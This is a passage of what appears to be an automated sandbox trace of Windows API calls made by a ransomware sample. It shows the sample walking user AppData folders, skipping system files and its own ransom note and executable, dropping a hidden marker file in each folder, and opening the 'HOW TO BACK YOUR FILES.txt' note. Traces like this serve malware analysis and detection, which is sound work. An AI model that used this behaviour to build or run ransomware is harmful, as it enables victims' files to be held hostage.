FILES.txt") returned -1 [0061.938] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.939] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x924fb15e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924fb15e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x924fb15e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCache", cAlternateFileName="INETCA~1")) returned 1 [0061.939] lstrcmpiW (lpString1="INetCache", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.939] lstrcmpiW (lpString1="INetCache", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.939] lstrcmpiW (lpString1="INetCache", lpString2="Rabbit4444.exe") returned -1 [0061.939] lstrcmpiW (lpString1="INetCache", lpString2=".") returned 1 [0061.939] lstrcmpiW (lpString1="INetCache", lpString2="..") returned 1 [0061.939] lstrcmpiW (lpString1="INetCache", lpString2="windows") returned -1 [0061.939] lstrcmpiW (lpString1="INetCache", lpString2="bootmgr") returned 1 [0061.939] lstrcmpiW (lpString1="INetCache", lpString2="pagefile.sys") returned -1 [0061.939] lstrcmpiW (lpString1="INetCache", lpString2="boot") returned 1 [0061.939] lstrcmpiW (lpString1="INetCache", lpString2="ids.txt") returned 1 [0061.939] lstrcmpiW (lpString1="INetCache", lpString2="NTUSER.DAT") returned -1 [0061.939] lstrcpyW (in: lpString1=0x130ebec, lpString2="INetCache" | out: lpString1="INetCache") returned="INetCache" [0061.939] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache", dwFileAttributes=0x2012) returned 1 [0061.940] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache" [0061.940] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\" [0061.940] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" [0061.940] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\ac\\inetcache\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x29c [0061.941] WriteFile (in: hFile=0x29c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.946] FlushFileBuffers (hFile=0x29c) returned 1 [0061.946] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCache\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.947] CloseHandle (hObject=0x29c) returned 1 [0061.947] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x121fe0 [0061.947] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xc8) returned 0x116520 [0061.947] RtlInterlockedPushEntrySList (in: ListHead=0xf6750, ListEntry=0x121fe8 | out: ListHead=0xf6750, ListEntry=0x121fe8) returned 0x0 [0061.947] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x924fb15e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924fb15e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x924fb15e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetCookies", cAlternateFileName="INETCO~1")) returned 1 [0061.947] lstrcmpiW (lpString1="INetCookies", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.947] lstrcmpiW (lpString1="INetCookies", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.947] lstrcmpiW (lpString1="INetCookies", lpString2="Rabbit4444.exe") returned -1 [0061.947] lstrcmpiW (lpString1="INetCookies", lpString2=".") returned 1 [0061.947] lstrcmpiW (lpString1="INetCookies", lpString2="..") returned 1 [0061.947] lstrcmpiW (lpString1="INetCookies", lpString2="windows") returned -1 [0061.947] lstrcmpiW (lpString1="INetCookies", lpString2="bootmgr") returned 1 [0061.947] lstrcmpiW (lpString1="INetCookies", lpString2="pagefile.sys") returned -1 [0061.947] lstrcmpiW (lpString1="INetCookies", lpString2="boot") returned 1 [0061.947] lstrcmpiW (lpString1="INetCookies", lpString2="ids.txt") returned 1 [0061.947] lstrcmpiW (lpString1="INetCookies", lpString2="NTUSER.DAT") returned -1 [0061.947] lstrcpyW (in: lpString1=0x130ebec, lpString2="INetCookies" | out: lpString1="INetCookies") returned="INetCookies" [0061.947] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetCookies", dwFileAttributes=0x2012) returned 1 [0061.948] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122360 [0061.948] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xcc) returned 0x108688 [0061.948] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122368 | out: ListHead=0xf68b0, ListEntry=0x122368) returned 0x121fc8 [0061.948] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x924fb15e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924fb15e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x924fb15e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="INetHistory", cAlternateFileName="INETHI~1")) returned 1 [0061.948] lstrcmpiW (lpString1="INetHistory", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.948] lstrcmpiW (lpString1="INetHistory", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.948] lstrcmpiW (lpString1="INetHistory", lpString2="Rabbit4444.exe") returned -1 [0061.948] lstrcmpiW (lpString1="INetHistory", lpString2=".") returned 1 [0061.948] lstrcmpiW (lpString1="INetHistory", lpString2="..") returned 1 [0061.948] lstrcmpiW (lpString1="INetHistory", lpString2="windows") returned -1 [0061.948] lstrcmpiW (lpString1="INetHistory", lpString2="bootmgr") returned 1 [0061.948] lstrcmpiW (lpString1="INetHistory", lpString2="pagefile.sys") returned -1 [0061.949] lstrcmpiW (lpString1="INetHistory", lpString2="boot") returned 1 [0061.949] lstrcmpiW (lpString1="INetHistory", lpString2="ids.txt") returned 1 [0061.949] lstrcmpiW (lpString1="INetHistory", lpString2="NTUSER.DAT") returned -1 [0061.949] lstrcpyW (in: lpString1=0x130ebec, lpString2="INetHistory" | out: lpString1="INetHistory") returned="INetHistory" [0061.949] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetHistory", dwFileAttributes=0x2012) returned 1 [0061.949] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x122000 [0061.949] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xcc) returned 0x108838 [0061.949] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x122008 | out: ListHead=0xf68b0, ListEntry=0x122008) returned 0x122368 [0061.949] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x924fb15e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924fb15e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x924fb15e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 1 [0061.949] lstrcmpiW (lpString1="Temp", lpString2="HOW TO BACK YOUR FILES.txt") returned 1 [0061.949] lstrcmpiW (lpString1="Temp", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0061.949] lstrcmpiW (lpString1="Temp", lpString2="Rabbit4444.exe") returned 1 [0061.949] lstrcmpiW (lpString1="Temp", lpString2=".") returned 1 [0061.949] lstrcmpiW (lpString1="Temp", lpString2="..") returned 1 [0061.949] lstrcmpiW (lpString1="Temp", lpString2="windows") returned -1 [0061.949] lstrcmpiW (lpString1="Temp", lpString2="bootmgr") returned 1 [0061.949] lstrcmpiW (lpString1="Temp", lpString2="pagefile.sys") returned 1 [0061.949] lstrcmpiW (lpString1="Temp", lpString2="boot") returned 1 [0061.949] lstrcmpiW (lpString1="Temp", lpString2="ids.txt") returned 1 [0061.949] lstrcmpiW (lpString1="Temp", lpString2="NTUSER.DAT") returned 1 [0061.949] lstrcpyW (in: lpString1=0x130ebec, lpString2="Temp" | out: lpString1="Temp") returned="Temp" [0061.949] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0x13) returned 0x1222c0 [0061.949] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x0, Size=0xbe) returned 0x11e368 [0061.949] RtlInterlockedPushEntrySList (in: ListHead=0xf68b0, ListEntry=0x1222c8 | out: ListHead=0xf68b0, ListEntry=0x1222c8) returned 0x122008 [0061.949] FindNextFileW (in: hFindFile=0x102410, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x924fb15e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924fb15e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x924fb15e, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Temp", cAlternateFileName="")) returned 0 [0061.949] FindClose (in: hFindFile=0x102410 | out: hFindFile=0x102410) returned 1 [0061.949] lstrcpyW (in: lpString1=0x130ebec, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.950] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\ac\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.950] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.950] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.950] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.951] CloseHandle (hObject=0x29c) returned 1 [0061.951] CloseHandle (hObject=0x27c) returned 1 [0061.951] GetCurrentThreadId () returned 0xd98 [0061.951] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x1222c8 [0061.951] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\Temp", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\Temp" [0061.951] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x11e368 | out: hHeap=0xe0000) returned 1 [0061.951] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1222c0 | out: hHeap=0xe0000) returned 1 [0061.951] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\Temp" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\Temp") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\Temp" [0061.951] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\Temp", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\Temp\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\Temp\\" [0061.951] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\Temp\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" [0061.951] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\ac\\temp\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.952] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.954] FlushFileBuffers (hFile=0x27c) returned 1 [0061.955] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\Temp\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.956] CloseHandle (hObject=0x27c) returned 1 [0061.956] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\Temp") returned 94 [0061.956] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.956] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\Temp\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x924fb15e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924fb15e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee3f1303, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102850 [0061.956] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.956] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.956] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.956] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.956] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x924fb15e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924fb15e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee3f1303, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.956] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.956] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.956] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.956] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.956] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0061.956] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee3f1303, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee3f1303, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee3f1303, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 1 [0061.957] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.957] lstrcmpiW (lpString1=".BFC0E91B00AE8A0620D3", lpString2=".BFC0E91B00AE8A0620D3") returned 0 [0061.957] FindNextFileW (in: hFindFile=0x102850, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2, ftCreationTime.dwLowDateTime=0xee3f1303, ftCreationTime.dwHighDateTime=0x1d54052, ftLastAccessTime.dwLowDateTime=0xee3f1303, ftLastAccessTime.dwHighDateTime=0x1d54052, ftLastWriteTime.dwLowDateTime=0xee3f1303, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x3d4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".BFC0E91B00AE8A0620D3", cAlternateFileName="BFC0E9~1")) returned 0 [0061.957] FindClose (in: hFindFile=0x102850 | out: hFindFile=0x102850) returned 1 [0061.957] lstrcpyW (in: lpString1=0x130ebf6, lpString2="HOW TO BACK YOUR FILES.txt" | out: lpString1="HOW TO BACK YOUR FILES.txt") returned="HOW TO BACK YOUR FILES.txt" [0061.957] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\Temp\\HOW TO BACK YOUR FILES.txt" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\ac\\temp\\how to back your files.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x27c [0061.957] CreateFileMappingW (hFile=0x27c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x74c, lpName=0x0) returned 0x29c [0061.957] MapViewOfFile (hFileMappingObject=0x29c, dwDesiredAccess=0xf001f, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x70000 [0061.958] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0061.958] CloseHandle (hObject=0x29c) returned 1 [0061.958] CloseHandle (hObject=0x27c) returned 1 [0061.958] GetCurrentThreadId () returned 0xd98 [0061.958] RtlInterlockedPopEntrySList (in: ListHead=0xf68b0 | out: ListHead=0xf68b0) returned 0x122008 [0061.958] lstrcpynW (in: lpString1=0x130eb38, lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetHistory", iMaxLength=2048 | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetHistory" [0061.958] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108838 | out: hHeap=0xe0000) returned 1 [0061.958] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x122000 | out: hHeap=0xe0000) returned 1 [0061.958] lstrcatW (in: lpString1="", lpString2="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetHistory" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetHistory") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetHistory" [0061.958] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetHistory", lpString2="\\" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetHistory\\") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetHistory\\" [0061.958] lstrcatW (in: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetHistory\\", lpString2=".BFC0E91B00AE8A0620D3" | out: lpString1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3") returned="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" [0061.958] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\microsoft.xboxspeechtotextoverlay_8wekyb3d8bbwe\\ac\\inethistory\\.bfc0e91b00ae8a0620d3"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x27c [0061.960] WriteFile (in: hFile=0x27c, lpBuffer=0x1008b4*, nNumberOfBytesToWrite=0x3d4, lpNumberOfBytesWritten=0x130caf8, lpOverlapped=0x0 | out: lpBuffer=0x1008b4*, lpNumberOfBytesWritten=0x130caf8*=0x3d4, lpOverlapped=0x0) returned 1 [0061.963] FlushFileBuffers (hFile=0x27c) returned 1 [0061.964] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetHistory\\.BFC0E91B00AE8A0620D3", dwFileAttributes=0x82) returned 1 [0061.964] CloseHandle (hObject=0x27c) returned 1 [0061.965] lstrlenW (lpString="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetHistory") returned 101 [0061.965] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0061.965] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\Microsoft.XboxSpeechToTextOverlay_8wekyb3d8bbwe\\AC\\INetHistory\\*", lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x924fb15e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924fb15e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee41741a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x102a90 [0061.965] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.965] lstrcmpiW (lpString1=".", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.965] lstrcmpiW (lpString1=".", lpString2="Rabbit4444.exe") returned -1 [0061.965] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0061.965] FindNextFileW (in: hFindFile=0x102a90, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x2012, ftCreationTime.dwLowDateTime=0x924fb15e, ftCreationTime.dwHighDateTime=0x1d32744, ftLastAccessTime.dwLowDateTime=0x924fb15e, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0xee41741a, ftLastWriteTime.dwHighDateTime=0x1d54052, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.965] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0061.965] lstrcmpiW (lpString1="..", lpString2=".BFC0E91B00AE8A0620D3") returned -1 [0061.965] lstrcmpiW (lpString1="..", lpString2="Rabbit4444.exe") returned -1 [0061.965] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0061.965] lstrcmpiW 